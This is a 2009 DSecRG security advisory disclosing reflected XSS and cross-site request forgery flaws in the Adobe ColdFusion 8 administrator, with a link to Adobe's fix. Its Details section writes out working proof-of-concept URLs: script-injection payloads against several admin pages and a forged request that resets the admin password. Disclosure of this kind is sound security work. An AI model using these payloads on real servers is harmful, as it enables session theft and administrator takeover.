Services Vulnerabilities Exploits Publications News Blog About DSecRG


[DSECRG-09-022] Adobe Coldfusion 8 - Multiple Linked XSS Vulnerabilies

Multiple Linked XSS and XSRF vulnerabilities were found in Adobe Coldfusion Server 8. An attacker can create an evil link and steal administrator's cookie


Digital Security Research Group [DSecRG] Advisory #DSECRG-09-022


Application: Adobe Coldfusion 8
Versions Affected: Adobe Coldfusion 8
Vendor URL: http://adobe.com
Bugs: Multiple Linked XSS,XSRF
Exploits: YES
Reported: 12.01.2009
Vendor response: 13.01.2009
Date of Public Advisory: 17.09.2009
CVE-number: CVE-2009-1872
Author: Alexander Polyakov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)


Details
*******

Multiple Linked XSS vulnerabilities were found on the Adobe Coldfusion Server 8.


1. A linked XSS vulnerability was found in the script searchlog.cfm. Vulnerable parameter is startRow.


Example
*******

http://localhost:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E

2. A linked XSS vulnerability was found in the script _logintowizard.cfm. An attacker can inject XSS in url string.


Example
*******
http://localhost:8500/CFIDE/wizards/common/_logintowizard.cfm?>'"><script>alert('DSECRG_XSS')</script>


3. A linked XSS vulnerability was found in the script _authenticatewizarduser.cfm. An attacker can inject XSS in url string.

Example
*******
http://localhost:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'"><script>alert('DSECRG_XSS')</script>


4. A linked XSS vulnerability was found in the script _authenticatewizarduser.cfm. An attacker can inject XSS in url string.

Example
*******
http://localhost:8500/CFIDE/administrator/enter.cfm?>'"><script>alert('DSECRG_XSS')</script>


Example
*******
http://127.0.0.1:8500/CFIDE/administrator/security/cfadminpassword.cfm?AdminAuth=password&cfadmin_Newpassword=sh2kerr2&cfadmin_NewpasswordConfirm=sh2kerr2&adminsubmit=Submit+Changes



Fix Information
***************
The issue has been solved August 17, 2009. http://www.adobe.com/go/apsb09-12


References:
***********

http://www.adobe.com/go/apsb09-12
http://www.dsecrg.com/pages/vul/show.php?id=122


About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com






Vulnerabilities RSS RSS
23.07.2010
[DSECRG-09-068] SAP NetWaver SLD - Multiple XSS

23.07.2010
[DSECRG-09-040] SAP Netweaver wsnavigator - XSS Security Vulnerability

05.07.2010
[DSECRG-09-054] IBM Bladecenter Management - Multiple vulnerabilities

14.05.2010
[DSECRG-09-058] Vmware View - XSS vulnerability

15.04.2010
[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability

12.04.2010
[DSECRG-09-053] VMware Remote Console - format string vulnerability

Vulnerabilities list


© 2002—2010, Digital Security
For quoting or using materials from this site
link is obligatory

+7 (812) 703-1547, +7 (812) 430-9130    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search